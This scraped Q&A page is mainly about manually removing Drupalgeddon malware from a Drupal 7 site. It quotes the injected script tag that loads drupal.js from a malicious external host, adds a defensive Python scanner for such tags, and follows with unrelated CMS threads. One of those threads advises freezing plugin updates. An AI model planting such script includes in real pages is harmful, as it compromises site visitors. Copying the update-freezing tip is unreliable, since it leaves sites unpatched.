How can I manually clean Drupalgeddon malware? - drupal

In one of my older Drupal 7 installations I found this JS reference in my page's source code.
<script type="text/javascript" src="//upgraderservices.cf/drupal.js"></script>
According to my Google search this could be caused by Drupalgeddon malware. I have read some hints on how to clean the system, but most of them recommend restoring the server from a previous backup. However, I do not want to lose current comments and would like to do a manual cleanup.
Where and how is this script added? I thought it might be included with Drupal blocks. But when I disabled all blocks the script remained.
I think it must be somewhere in the Drupal bootstrap procedure. Any ideas where to start and in which file (PHP?) the additional drupal.js is added?

In my case (Drupal 7) the hack was inserted in the HTML source of all blocks with only an image. About 10 instances in my case. I deleted them by editing the content of the blocks in the user interface in 'source-mode'.
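
A read-only check for the pattern this answer describes, as an added example that is not part of the original post: it scans custom block bodies for script tags that load from hosts outside an allowlist, so every affected block can be listed before editing. It assumes the rows were exported as (bid, info, body) from the Drupal 7 block_custom table; ALLOWED_HOSTS and the sample rows are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately loads scripts from; adjust per site.
ALLOWED_HOSTS = {"www.example.org"}


class ScriptCollector(HTMLParser):
    """Collect <script> tags found in one HTML fragment."""

    def __init__(self):
        super().__init__()
        self.sources = []   # src values of external scripts
        self.inline = 0     # count of <script> tags without src

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.sources.append(src.strip())
        else:
            self.inline += 1


def scan_blocks(rows, allowed=ALLOWED_HOSTS):
    """Return (bid, info, reason) for every block body that needs review."""
    findings = []
    for bid, info, body in rows:
        parser = ScriptCollector()
        parser.feed(body or "")
        parser.close()
        for src in parser.sources:
            # urlparse also resolves protocol-relative URLs ("//host/path").
            host = urlparse(src).hostname
            if host and host not in allowed:
                findings.append((bid, info, "external script: " + host))
        if parser.inline:
            findings.append((bid, info, "inline script"))
    return findings


# Constructed sample rows (bid, info, body); not taken from a real site.
SAMPLE_ROWS = [
    (1, "Footer logo", '<img src="/sites/default/files/logo.png">'),
    (2, "Banner", '<img src="/files/banner.jpg"><script type="text/javascript"'
                  ' src="//upgraderservices.cf/drupal.js"></script>'),
    (3, "Stats", '<script src="https://www.example.org/stats.js"></script>'),
]
```

Blocks are only one place markup is stored; the same scan can be run over any other exported text column by passing its rows in the same three-field shape.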

Related

Website files saved in browser's cache prevent changes from being displayed

This is probably a dumb question, but I'm worried:
I have published a website on a server, then made some changes to a CSS file.
As the CSS file was already cached by my browser, it didn't display the changes.
Deleting the cache allowed the changes to be displayed.
Now my worry is that if some users have previously been to the website, and it is cached by their browser, if I make a change they wouldn't be able to see it.
How do you guys prevent this? Do you just change the file names?
Sorry for my noobness,
Thanks.
There are a number of solutions floating around the web, but as far as I can tell they all boil down to changing the CSS filenames whenever their content changes. That way you steer clear of user caches and server caches serving old content.
Variants:
Instead of changing the name of the file itself, create a symbolic link with a new name to the old file whenever content changes.
Instead of changing the name of the file, change the way it is referenced by the page. Replacing myfile.css?v=1 by myfile.css?v=2 circumvents people's caches.
Write code that automatically changes the name or the link name or the way the file is referenced.
Use a framework that does one of the above.
And: remember that the same problem applies to any content that might be cached, like JS files.

Where could be inline-css in Wordpress

I am working on this webpage: http://hypoinvest.sk/ which runs on WordPress with this theme. If you check the source code you can see a lot of inline CSS, and I want to know in which files it is actually defined. The only thing I know about it is that the rules are called by the function wp_head() in header.php. I have a local copy of all files of this website and I can't find any mention of some of those CSS rules through Unix grep. Does anyone suspect where these CSS rules could be located?
Check the site and let me know.
Run a search in the source code for
style-inline
As this appears to be the 'handle' designated as the first variable in the function wp_add_inline_style. The "-css" is added automatically. You'll see this on line 79 of the page source.
https://codex.wordpress.org/Function_Reference/wp_add_inline_style
You want to check your page's back end, where you put the content.
I think you are using a composer or editor to create the page on the edit page.
Check its edit option; it has some inline CSS.

drupal 6 /user/permissions checkbox page core module

Does anyone know where I can find the code that makes the user/permissions checkbox page in Drupal? I'd like to see how it's done to make something similar for a custom module I'm building.
The function you're looking for is theme_checkbox($element) and can be found in root/includes/form.inc. If you ever want to know what function/template is responsible for a certain HTML element then Theme developer is your friend.
Enable the module, set the permissions and you'll see a small checkbox Themer info. Then just point to the HTML part you're interested and see what theme function/template is doing the rendering.
I think in the default modules folder there is a user folder, and its user.admin.inc file contains the code for permissions. The function is user_admin_perm(); see this code.

How to make sure changes to a Wordpress plugin won't be lost on plugin update?

I'm pretty sure I've read somewhere that you can actually move the main plugin *.php file to somewhere else (I assume under your theme directory) to have it safe in case you made changes to it and your plugin updates. I tried Google but I can't find anything. Google page with good results will suffice.
I've just experienced a situation where my 2 plugins which had its layout changed and accommodated my needs and I want to make sure it doesn't happen again. Apart from having the main file in another location, is there a way to move along any CSS and JS files as well?
In Concrete5 CMS there is a nice way of doing this, by creating a new folder inside a block of an addon (may be regarded as a WP plugin), inside of which you can create copies of main file, any CSS and JS files and then you can simply edit them and choose that template for a page location you are using that block in.
I assume there is no such thing in Wordpress but how close can I get?
UPDATE: I found where I applied that advice on creating a new instance of the file then moving it to the theme directory.
The plugin in question was HL-Twitter. These are the plugin files:
admin.php
archive.php
functions.php
hl_twitter.php
hl_twitter_archive.php
hl_twitter_widget.php
import.php
widget.php
Now, this is the top contents (commented out) of the hl_twitter_widget.php:
Widget Theme for HL Twitter
To change this theme, copy hl_twitter_widget.php
to your current theme folder, do not edit this
file directly.
Available Properties:
$before_widget
$after_widget
$before_title
$after_title
$widget_title
$show_avatars
$show_powered_by
$num_tweets: how many tweets to show
$tweets: array of $tweet
$tweet: object representing a tweet
$tweet->twitter_tweet_id
$tweet->tweet
$tweet->lat
$tweet->lon
$tweet->created
$tweet->reply_tweet_id
$tweet->reply_screen_name
$tweet->source
$tweet->screen_name
$tweet->name
$tweet->avatar
$user: represents the Twitter user (ONLY SET IF SHOWING A SINGLE USERS TWEETS!)
$user->twitter_user_id
$user->screen_name
$user->name
$user->num_friends
$user->num_followers
$user->num_tweets
$user->registered
$user->url
$user->description
$user->location
$user->avatar
So I was wrong about copying the main file (in this case hl_twitter.php), but still - this enabled me to edit the file outside the plugin directory and the system somehow checks for its existence and picks it up if exists.
Is this behavior something that is natively supported by WordPress, or has it been integrated in the plugin itself?
With themes, Wordpress has a concept of "child themes" which allows exactly that: to keep changes separate from main theme, in case it changes.
I haven't yet found a way to do this with plugins.
I'm using a few tactics myself:
I bump plugin version to a very high number like 99.9. This way Wordpress won't ever update the plugin.
Store my plugins in version control (I use git, but it doesn't matter); this allows you to update the plugin, run the 'diff' tool and see what changes happened. If you don't like them, you just revert, as you would with bad code you've written. But this approach requires a bit of skill.
Are you talking about running parts of a modified 3rd party plugin, and an updated version, at the same time?
That's not going to be possible. There is no magical method of "preserve my changes and transfer them into the new version automatically". The way to go here is doing a diff between the edited version and the update, and integrating the changes in the actual source files.
The bottom line is, if you manually edit a third party plugin, you're in for manual review (and possibly rework) once an update takes place. That's why it's usually not a good idea to extensively modify third party plugins.
Well in fact, yes! There is some kind of way.
You have to remove the original actions/filters of the plugin to be modified and then add your altered actions/filters.
If the desired plugin is even coded in OOP you can just inherit the whole class and rewrite the wanted functions (oh sorry: "methods". We're talking about OOP ;) ). Instantiate your inherited class and do the rest as above.
Maybe there are better ways! I already searched for a method so that the original class won't even get loaded but our altered one instead, but I'm no John Carmack.

Template files not being discovered

I was experiencing an odd problem where blocks were not showing up on a site. After a lot of spelunking I have found that block.tpl.php is not getting called/discovered.
Looking at the suggestions that the theme engine is trying to find it looks like the most general template it will look for is block-MODULE.tpl.php - ie if I set up symlinks for block-block.tpl.php, block-views.tpl.php etc then the content will show.
It just won't find block.tpl.php
So I can kind of make the problem go away, but I'd feel a lot better if I could fix it properly.
Anyone know why (or where) this would happen?
This is drupal 6, with a zen subtheme. zen is in sites/all/themes/ the subtheme is in sites/example.com/themes/.
(it does seem to be finding page.tpl)
PHPTemplate will find the more general templates (e.g. block.tpl.php): you can confirm this behavior by looking in the themes/garland folder which has its own block.tpl.php.
The most common reason for the template engine ignoring your template overrides is because the theme registry has not been reset. You can reset it by going to Site Configuration -> Performance and clicking Clear cached data at the bottom of the page.
Also make sure you've gone through and followed the instructions for sub-theming exactly: missing a step can produce unexpected results:
How to build your own sub-theme (6.x-2.x)
How to build your own sub-theme (6.x-1.x)
Turns out I had added a to the hook_theme() function in template.php for blocks that was pointing to a different location and confusing everyone.
Why I did that is lost to history, but it seems to serve no useful purpose.
There should be a version of block.tpl.php in both the theme and subtheme directories.
